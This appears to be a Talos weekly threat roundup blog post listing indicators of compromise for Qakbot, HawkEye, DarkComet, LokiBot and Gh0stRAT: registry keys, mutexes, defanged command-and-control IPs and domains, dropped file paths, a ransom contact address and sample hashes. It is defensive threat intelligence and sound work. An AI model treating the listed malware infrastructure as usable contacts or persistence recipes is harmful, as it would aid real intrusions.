Friday, August 7, 2020

Threat Roundup for July 31 to August 7


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 31 and Aug. 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.Qakbot-9146336-0 Dropper Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
Win.Packed.HawkEye-9228219-0 Packed HawkEye is an information stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media.
Win.Dropper.DarkComet-9199045-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Dropper.LokiBot-9170218-0 Dropper Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Dropper.Gh0stRAT-9224912-0 Dropper Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Dropper.NetWire-9164792-0 Dropper NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.

Threat Breakdown

Win.Dropper.Qakbot-9146336-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ErrorControl
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ImagePath
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DisplayName
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DependOnService
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: DependOnGroup
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: WOW64
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ
Value Name: ObjectName
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AVKAXOQ 15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Type
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Start
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ErrorControl
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ImagePath
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DisplayName
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnService
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnGroup
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: WOW64
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ObjectName
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX 10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: iyifdyu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cvuhzmmn
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: udilcq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: pgmgxaj
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: gfnrpxh
1
Mutexes Occurrences
llzeou 25
Global\amztgg 15
amztgga 15
Global\eqfik 10
eqfika 10
<32 random hex characters> 10
<random, matching [a-zA-Z0-9]{5,9}> 8
<random, matching [a-fA-F0-9]{10}> 6
\Sessions\1\BaseNamedObjects\yctaxosa 1
\Sessions\1\BaseNamedObjects\445662303a 1
\Sessions\1\BaseNamedObjects\suzwffr 1
\Sessions\1\BaseNamedObjects\Global\yyvta 1
\Sessions\1\BaseNamedObjects\445662305a 1
\Sessions\1\BaseNamedObjects\yyvtaa 1
\Sessions\1\BaseNamedObjects\Global\ailvb 1
\Sessions\1\BaseNamedObjects\445662309a 1
\Sessions\1\BaseNamedObjects\oaubkey 1
\Sessions\1\BaseNamedObjects\ailvba 1
\Sessions\1\BaseNamedObjects\Global\rjiceww 1
\Sessions\1\BaseNamedObjects\rjicewwa 1
\Sessions\1\BaseNamedObjects\445662307a 1
\Sessions\1\BaseNamedObjects\kpzvif 1
\Sessions\1\BaseNamedObjects\vpubka 1
\Sessions\1\BaseNamedObjects\Global\vpubk 1
\Sessions\1\BaseNamedObjects\kebqimrg 1
*See JSON for more IOCs
Files and or directories created Occurrences
%APPDATA%\Microsoft\Amztggm 15
%APPDATA%\Microsoft\Amztggm\amztg.dll 15
%APPDATA%\Microsoft\Amztggm\amztgg.exe 15
%TEMP%\~amztgg.tmp 15
%APPDATA%\Microsoft\Eqfikq 10
%APPDATA%\Microsoft\Eqfikq\eqfi.dll 10
%APPDATA%\Microsoft\Eqfikq\eqfik.exe 10
%TEMP%\~eqfik.tmp 10
%APPDATA%\Microsoft\Duazxlbu\duazxl.dll 1
%APPDATA%\Microsoft\Duazxlbu\duazxlb.exe 1
%APPDATA%\Microsoft\Dcpptfmac\dcpptfm.dll 1
%APPDATA%\Microsoft\Dcpptfmac\dcpptfma.exe 1
%APPDATA%\Microsoft\Uunhru\uunh.dll 1
%APPDATA%\Microsoft\Uunhru\uunhr.exe 1
%APPDATA%\Microsoft\Wyrcaqdy\wyrcaq.dll 1
%APPDATA%\Microsoft\Wyrcaqdy\wyrcaqd.exe 1
%APPDATA%\Microsoft\Lhbdih\lhbd.dll 1
%APPDATA%\Microsoft\Lhbdih\lhbdi.exe 1
%APPDATA%\Microsoft\Zaemxbdja\zaemxbd.dll 1
%APPDATA%\Microsoft\Zaemxbdja\zaemxbdj.exe 1
%APPDATA%\Microsoft\Poebyko\poeby.dll 1
%APPDATA%\Microsoft\Poebyko\poebyk.exe 1
%APPDATA%\Microsoft\Gueathru\gueath.dll 1
%APPDATA%\Microsoft\Gueathru\gueathr.exe 1
%APPDATA%\Microsoft\Fiqyoi\fiqy.dll 1
*See JSON for more IOCs

File Hashes

00cad8f6750c3f223f9a228969c727ce711830492436947fc6c16282d528e0be 064e6ce0623bef879ea9d85f5653b7e1dd06e17b8852c65614d813b9fc0aecb2 11358b03f203810ba77da708c3f511aaa56f5aef0361f4954e33728f2e4b5df1 1172f535563187bb44be9e7cfe1f5eabb5e8cfc22ca0e69be079a664abc52e6c 12d77a596dd4b6209a95a52e7950b9845579cdb493de616c4165ce5b3314b8f1 164398b068ba8ab5ea8ca731ad9f8ffe7f2c4cd87a799010aa18dc1f7258c623 195a7c0debf86e788da5475161572ac5eecf9217ca978b2ff3942ebdb4694b0d 1fa4f25154137ccc88d289267b9055569326486ed04af47fe7ff21e043d86fde 210c4073b9f8cfbad599329cc41a0278d2cc55b28a666630dce33534c9299e32 24af6d356227daa57c11887b14a4cc0bfe422c73752e784ce2868739fbd7a82d 274cac7b54de8a5b23209af3bb8b9b2950a87267b8f62471df432ef2fb21afe3 2a981c6a52c04db6d074ea75abff3b1db6ec3d2f5104bd6f3b9feba215730c34 2aecba1acd75adbabd9bc5d11c129ca3527bd646ab28c90ac40f04f55816e97d 2f6d93b3ecd92eebfba2d262ceb78fa90cc3e4b85369a1473c59865aec868e1d 2feb022802257d13f5d296b966d92759b6a872766c47e90b3b8b371a0819b98f 30e0c7051021cf70472ae34741aeb1aae1af98c1cbe0a6ca9de86b9fa687c16f 31e127a5571c2f8c4dc097b6ab219ffb764594d3fa42df4040511c139e0af02d 31fd1383bcc447fd2726b003d5a8c02270df67b49321182749a8f0cf204d1e0b 3af60109f2158300ad8925c927e4716d55b1d27a9c43a396d12d4b64e026645f 3b5ae60682df4f20b0ed2d0f53aefa85d38f63ef6fcbd6ac75ab895f51a65324 3b64ba312348241705f0a7ce61cc6e4abcf49f5b5f9b842956848cb374932f7c 3e28437ec03595cba0e16a029dba289c6c1f19de272190edcae5c59d867653bf 430b65da54219d0c97e1a2a1db0281be4d11c94861577646f68cf2c3a8c310c8 431682a701e14edb3f942d0d53708aec65b65948f8ea139e91d8d2e568e86662 45cd32ffbc15160ad7aeb98c0bf08c25c2085df7b9b49d1202e9d7476eaf0687
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Packed.HawkEye-9228219-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
22
<HKCR>\LOCAL SETTINGS\MUICACHE\66\52C64B7E
Value Name: LanguageList
21
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update
3
Mutexes Occurrences
WAdYUoVlJMDozTcnfGyo 1
AtBUGSYNOJQfUkQxnnGp 1
xLKmUOQjVQhJAltxEDap 1
xeqJzzMVyAyYnoTrCxFC 1
QzcHfvhyYmPAaxNyiPOv 1
kGICOjHlcOSzAhmoklHj 1
SyfAjmiHnNlQLJcjjEXx 1
falklIVtkFihJmUVSTXE 1
sUAXLQaxSQfYNpWJAuBP 1
cWUiiqhvlmsDMYJjLfkN 1
tSpmLtnijYJIHwQpFVTy 1
teVOqzhfFhQnxWVkhAcA 1
bLqdxULAMnpWeOHsDkJe 1
ycCYSAgmGRupHMOqxEbh 1
HPMUMhghCsItkYLOGKRq 1
dcrTXLYTeHaImzpsynua 1
fpXLMUIlDWlGHLbpJvRg 1
RbUDNRSedTOGBrvsvUhD 1
hvncOfryNgVnlSdgfoiU 1
muCbudfCdwsRPJlTEnII 1
OXgeRTSNuzldRxagdXvR 1
FLoNVwOlzJinJeWpHeAi 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
216[.]146[.]43[.]70/31 14
216[.]146[.]38[.]70 9
162[.]88[.]193[.]70 7
103[.]17[.]124[.]72 7
91[.]198[.]22[.]70 6
91[.]198[.]22[.]142 5
131[.]186[.]161[.]70 5
146[.]148[.]88[.]167 5
131[.]186[.]113[.]70 4
103[.]254[.]255[.]235 3
74[.]208[.]5[.]15 2
103[.]215[.]136[.]10 2
82[.]223[.]149[.]134 2
202[.]75[.]53[.]189 2
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]dyndns[.]org 22
checkip[.]dyndns[.]com 22
mail[.]falconequipment[.]com[.]my 7
mail[.]vogue-steel[.]com 5
mail[.]zenitel[.]com[.]sg 4
13[.]169[.]14[.]0[.]in-addr[.]arpa 3
smtp[.]mail[.]com 2
232[.]243[.]5[.]0[.]in-addr[.]arpa 2
216[.]47[.]6[.]0[.]in-addr[.]arpa 2
mail[.]airkelantan[.]com[.]my 2
mail[.]cofrupla[.]com 2
24[.]107[.]12[.]0[.]in-addr[.]arpa 1
159[.]228[.]9[.]0[.]in-addr[.]arpa 1
207[.]189[.]1[.]0[.]in-addr[.]arpa 1
205[.]12[.]2[.]0[.]in-addr[.]arpa 1
241[.]215[.]8[.]0[.]in-addr[.]arpa 1
236[.]76[.]10[.]0[.]in-addr[.]arpa 1
35[.]56[.]3[.]0[.]in-addr[.]arpa 1
242[.]116[.]3[.]0[.]in-addr[.]arpa 1
146[.]215[.]12[.]0[.]in-addr[.]arpa 1
167[.]187[.]14[.]0[.]in-addr[.]arpa 1
27[.]58[.]7[.]0[.]in-addr[.]arpa 1
57[.]122[.]6[.]0[.]in-addr[.]arpa 1
Files and or directories created Occurrences
%APPDATA%\pid.txt 22
%APPDATA%\pidloc.txt 22
%TEMP%\Mail.txt 22
%TEMP%\Web.txt 22
%System32%\wbem\Logs\wbemprox.log 18
%TEMP%\dw.log 18
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp 17
\Sys.exe 9
\autorun.inf 9
E:\autorun.inf 9
E:\Sys.exe 9
%APPDATA%\WindowsUpdate.exe 3

File Hashes

03344bc984096a07b79e85237352ef2286805b993d3a7ee43a588cf42a6ed519 07886e04b3ac7e91dbb6994be27cfc929933c654978b64a3a7a0009f997e161d 0936878054623832906646290d8f5f5fe955f60523a0f7ebf4896c329cbebdfa 0afc9af65a81c5ab801faf042a3bf5d3d1eee3d4a75962a9d8e51b495f0ac2fb 2230badacb83d848b44ecbeb2ebd9a72c046669e6fb7fd209a44db96a007632a 230ccb40553d3abd4fe593813495194d67b117a20cf3c33fb8074c9fdde45ab1 25d122f2016f4c5e1f409ddddb40f1d2f5667bf17f7ee3abb3bb4039599cb824 3124cc47d6580290a1d95055879e6c0876106ed4331101d8d5eb3d721c5d779d 32efa6a26fb26eab1efbc8ad110d067914522cbddb15200a577064474555201a 456adc548e01b5c7462a6cb97c4814389bcccdffbc5ffa87073ff69d8ea4805d 5d48e1129e22ce7f73c6f4f82ed7b60cba754354e7ae5552ca617612b3d26d09 793260438b0d1a87604e37a077f50109b425a0aae810fb4213b3d39c241d2104 8f70816165287d9bd18bc4678b8bc5f421ac9616f239e835e226d2c02913b90e 9085a359e0bb5b5594d08cd8210527cc18eef2ecbd6abad2a0194eaebe3ed962 a8f4e015e9082c93af28b3c4aae4b9a0605d577ab92b14179c74f2cd53baf1d2 c1867350880ca673f64adfdd87121868c2997e74800426fc5600c659482134bc c2b64b805d62e4ebd0869fc391588cb19ad5ebf0b1b915fe28fe0ee9a282c56c cd62fc24cab06b7792d8091d60999b9b108cea519e51584e920a816269228e72 cdb1a7a1559ec2a88555c1a09bde03f8af2be52f33db28d5d8810937bde3edf2 d41966907a2a009036f71a8c22c831f15ac02ee1efc8d69b4af768cc904f711a f68ba6510fd91f4f49caa10e19dc31ecb85e189afd4a4b581fb792732c239cec ff09dbdd5ea882b3f94caabb1e8826514ebdf05e9a514d15e53856d5d0e8e778

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Dropper.DarkComet-9199045-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 11
Mutexes Occurrences
DC_MUTEX-ZFF80Q7 11
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
209[.]97[.]151[.]172 11
204[.]79[.]197[.]200 2
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
pownedfag[.]pw 11
Files and or directories created Occurrences
%APPDATA%\dclogs 11
%TEMP%\ExdosVT 11
%TEMP%\ExdosVT\exmsae.exe 11
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\exmsae.vbs 11

File Hashes

112cf541506407f27c512bdbffb2b608b4e608bbfd9497fb2657ed8f1f478c8f 1eb6b14ddd5e440c5ecb7e7b078b0b58954292728f5ec9ac02e8702f9e47a317 2063076cd065bd1f302bfbae83055eedf1282276a06804e7806ced2316d815c9 4b240ac760235aa37777283771ae2f69a0651cdd071dce8286514f9810b6d464 667763873e8b017386361ff89ac14ddb9e00c387a8426e05652231c98acf20be 92777d292742325b78ea9626bf3c266354b34813ccbbb9136488503a2bf7cdb3 9d7b148f01da2b61bee602fec0717d065627ae3a5ca09404b526a1eb4059dbc1 a9d2bad78b514cd9a109125073eb44a85fe7e2bdb14acc9a44b1ae7a643a453f ba8b311cf604bd41d778c106c5139df15996346d570f2047662aa94d780b4d41 c16197238a4e8cf459f91665178dccf0512c0cd0de7f88bf1f69dc5205f42a35 c78ff74f453540088ee77551679c07e6f7c6351fd69ecf4a3403a17e51e598cc

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


Umbrella


MITRE ATT&CK




Win.Dropper.LokiBot-9170218-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG
Value Name: StoreLocation
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\WINDOWS ERROR REPORTING\DEBUG
Value Name: StoreLocation
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
1
<HKCU>\SOFTWARE\NETWIRE 1
<HKCU>\SOFTWARE\NETWIRE
Value Name: HostId
1
<HKCU>\SOFTWARE\NETWIRE
Value Name: Install Date
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d89c6a81c7330d528071da246dac388b1e63d93dad11c332b093d6e2b4eb880a
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d89c6a81c7330d528071da246dac388b1e63d93dad11c332b093d6e2b4eb880a
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d9085f342d9c9d0d59c9db5e085f2034886007aa670d1cb141bde063f2fca871
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d9085f342d9c9d0d59c9db5e085f2034886007aa670d1cb141bde063f2fca871
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fcbeac9fe0d60767d0a54af568880f3032a9db588d492325ede97e219e69d6c0
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fcbeac9fe0d60767d0a54af568880f3032a9db588d492325ede97e219e69d6c0
1
Mutexes Occurrences
- 3
Global\<<BID>>98B68E3C00000001 3
Global\<<BID>>98B68E3C00000000 3
\Sessions\1\BaseNamedObjects\- 3
3749282D282E1E80C56CAE5A 2
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A 2
(null)\69884752-95BE-4032-8AF1-B300F0E2CB97-Mutex 2
\Sessions\1\BaseNamedObjects\9DAA44F7C7955D46445DC99B 2
Global\0a70f6c1-d435-11ea-887e-00501e3ae7b6 1
Global\f25df061-d434-11ea-887e-00501e3ae7b6 1
Global\ff8d6d61-d434-11ea-887e-00501e3ae7b6 1
\Sessions\1\BaseNamedObjects\A2CF10742-C1AFDB0A-F2351354-EF2CFB53-EE38A44C 1
\Sessions\1\BaseNamedObjects\A2CF10742-C1AFDB0A-F2351354-874F81C6-865B2AC0 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
79[.]134[.]225[.]103 2
208[.]91[.]199[.]225 1
104[.]16[.]155[.]36 1
204[.]79[.]197[.]200 1
103[.]200[.]5[.]128 1
208[.]91[.]199[.]223 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ml[.]warzonedns[.]com 2
bright1[.]awsmppl[.]com 2
hgfjhfs[.]ru 2
whatismyipaddress[.]com 1
us2[.]smtp[.]mailhostbox[.]com 1
202[.]200[.]1[.]0[.]in-addr[.]arpa 1
gracetime[.]tech 1
jetterweb[.]tech 1
Files and or directories created Occurrences
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\desktop.ini.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\1033\dv_dexplore.hxs.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\1033\msenvui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\1033\vslogui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\1033\vsmsoui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\Microsoft.WizardFramework.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\Microsoft.WizardFrameworkVS.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\Visualui.TTF.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\cmddef.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\custsat.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\dexplore.exe.config.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\dexplore.exe.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\dexplore.exe.manifest.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\dexplore.prf.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help 8\vslog.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1028\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1031\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1031\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1033\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1033\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1036\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1036\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1040\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1040\hxvzui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
%CommonProgramFiles(x86)%\microsoft shared\Help\1041\hxdsui.dll.id[98B68E3C-2275].[recovermyfiles2019@thesecure.biz].Adame 3
*See JSON for more IOCs

File Hashes

2479a1f285949cf7a2b19758f78ecbc595665073d3b13fd399e06c1a33ca157d 267005cd5221b3fffb3d57a3a30782df4428888287974534a82d5a81bf531344 37e8f8cf627b3621dcd50754245d1148d669ab617ede5d253f15fed34cdfd2b7 4abe0fb2888c22709d10e06e7c3865e0a7b64d2d0bf49d9f4cdafef6467e1afc 6b9d2a9fed4f31531e86ddddbd22e07f3603179d1f9cfd3aa15c2d21cbe28496 6e3360bcd7d3087b3b91e12e3d579791183c62a4a080448b44150a16a301d3aa 75b5a3506e7061b43a6d0f48dcb816b496dad94ff4e6b09617126ce5f590dbc7 8754bf9bad26c7832e391c2761e0835b925f40a06410dfedfb77fa22ad90a408 8e8a41d7eb37d4532ee8bdc830d68393c89d35b53725f3faace4eab94b3718af 94363327dedb6a3d4fbdbb46ff0df0278287cdc14f7167500481e69c78998fc6 97dd7438acf6b0934b4d40818ad12337f68e8ed848b21b63723fed889e5aa487 a1954b3233d9982d400046f616bbdf41f2e76aa11521cba382eb46de7a04a02c bbd6b46b84553bdf7a5b0a4f75f47d4ca733ddba4bff8d40ae41ea568ccb7b93 bec06905124882892ac557c70e35587c8295c493ce9a6435f52bcdebf867dbfd d89c6a81c7330d528071da246dac388b1e63d93dad11c332b093d6e2b4eb880a d9085f342d9c9d0d59c9db5e085f2034886007aa670d1cb141bde063f2fca871 e0e6dbd7e409794d63e509a80a52ba93e8b6fa3e1c4a78ae58d6b4a1381b225d eeadaefc0f9331fbb9e1ceecf90667722dcae800a29c37413be37ff484daa61a fcbeac9fe0d60767d0a54af568880f3032a9db588d492325ede97e219e69d6c0

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Dropper.Gh0stRAT-9224912-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: it
18
Mutexes Occurrences
98.126.40.18:3204 18
M98.126.40.18:3204 18
\Sessions\1\BaseNamedObjects\M98.126.40.18:3204 17
\Sessions\1\BaseNamedObjects\98.126.40.18:3204 17
\Sessions\1\BaseNamedObjects\0x5d65r455f 3
0x5d65r455f 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
107[.]163[.]43[.]161 18
98[.]126[.]40[.]20 18
98[.]126[.]40[.]18/31 18
99[.]86[.]230[.]49 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
blogx[.]sina[.]com[.]cn 3
blog[.]sina[.]com[.]cn 3
Files and or directories created Occurrences
\1.txt 18
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 18
%ProgramFiles%\<random, matching '[a-z]{5,9}\[a-z]{3,9}'>.exe 18
%ProgramFiles%\<random, matching '[a-z]{5,9}\[a-z]{3,9}'>.dll 18
%ProgramFiles%\<random, matching '[a-z]{5,8}'> 18
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 17
%ProgramFiles%\osjmr\11220225 2

File Hashes

14c2e56ccf01db50b6242a22f101c3efa9647a1b2c64ab2934aec5f2203df371 1ba0917fe3179d56b20d19497d9fafb8c95bea11772a2f57a9e955044eeb3514 2a9bd454a0959f08695c41cf6b1dbd74f7b87e32335e5d687dcdfc8d0a4b3d92 33e5851f462dd323a0566c5c873577090caad0904f4dbabe9f9b46914f01a578 3b58437a04bc83687f5cb8da5e1da3a042bba2a7f2fd629a569bd4429f4a4ba1 41811767f2db21ab2448bd083b7f6d373269753c6b5b43fb43e9410f35e1bd06 55986f8df9ec84d3fff651d384cee3f59b85844723a411c5182c9bc95b1ee2e6 573418b8b607425005a66a878da015e5e8a601f817fdabbd8871b4504386bb67 756011afc3c4002c09b3ad38fefc973503b3162b1161c2e3a55f90fd61254fd8 8157fad7ad37b2f6123bf5f57408e8b3a11c9941676d7d5a92c4eeb1f26d6441 93f77dc4ab8f30cd2f53596ae343a3f95a235c0cc895445cd0e33f8be6265342 99d33060ab078f0e43ec5c978013ba8157f413a7f9f0fe847955eced09ca356d a7e3b7014dfd10577d8b8353ecd8cf541977683db4f6505c04aea82923608418 b8b1ebcb4859e9c0a93211b4f1070f7565b652a72f8e90139f1d92659bab6e23 bd6972691dd471a5118efb1f0d33c1928c07e943023d83f5eef0809a94a6f7d0 d2cf78a56e2979ac9cf625b8c0babd025452e1d40ca1fd77e90b45f044763104 fa08b3c9958e8823179acebc883b45e67eeee6f013222e831c179c6f24304a3e fd0ab4af554ea084e65ae83451dd6a042d85923ff90de709ba13bdb547cce55c

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
